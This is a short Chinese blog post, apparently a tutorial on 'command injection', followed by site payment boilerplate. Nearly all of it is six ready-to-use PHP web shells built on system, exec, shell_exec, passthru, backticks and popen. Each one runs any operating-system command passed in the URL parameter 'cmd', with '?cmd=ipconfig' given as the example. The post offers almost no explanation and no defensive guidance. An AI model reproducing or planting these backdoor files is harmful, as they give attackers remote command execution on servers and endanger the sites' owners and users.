命令注入

利用php文件进行命令注入的几种方法(添加参数可执行DOS命令):

1.system()

system.php

<meta charset='gb2312'>
<?php
if(isset($_GET['cmd'])){
    echo "<pre>";
    system($_GET['cmd']);
}?>

URL中接入?cmd=DOS命令
例:?cmd=ipconfig //查看IP

2.exec()

exec.php

<meta charset="gb2312">
<?php
if(isset($_GET['cmd'])){
    echo "<pre>";
    print exec($_GET['cmd']);
}?>

URL中接入?cmd=DOS命令
例:?cmd=ipconfig //查看IP

3.shell_exec()

shell_exec.php

 <?php
if(isset($_GET['cmd'])){
    print shell_exec($_GET['cmd']);
}?>

URL中接入?cmd=DOS命令
例:?cmd=ipconfig //查看IP

4.passthru()

passthru.php

<?php
if(isset($_GET['cmd'])){
    passthru($_GET['cmd']);
}?>

URL中接入?cmd=DOS命令
例:?cmd=ipconfig //查看IP

5.反引号

``.php

<?php
if(isset($_GET['cmd'])){
    $cmd=$_GET['cmd'];
    print `$cmd`;
}?>

URL中接入?cmd=DOS命令
例:?cmd=ipconfig //查看IP

6.popen()
popen() 这是返回文件指针,需要用>>导入到一个文件中,此代码中导入到了1.txt中,命令执行后需查看1.txt文件

popen.php

<?php
if(isset($_GET['cmd'])){
    $cmd=$_GET['cmd'].">> 1.txt";
    popen($cmd,'r');
}?>

URL中接入?cmd=DOS命令
例:?cmd=ipconfig //查看IP

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值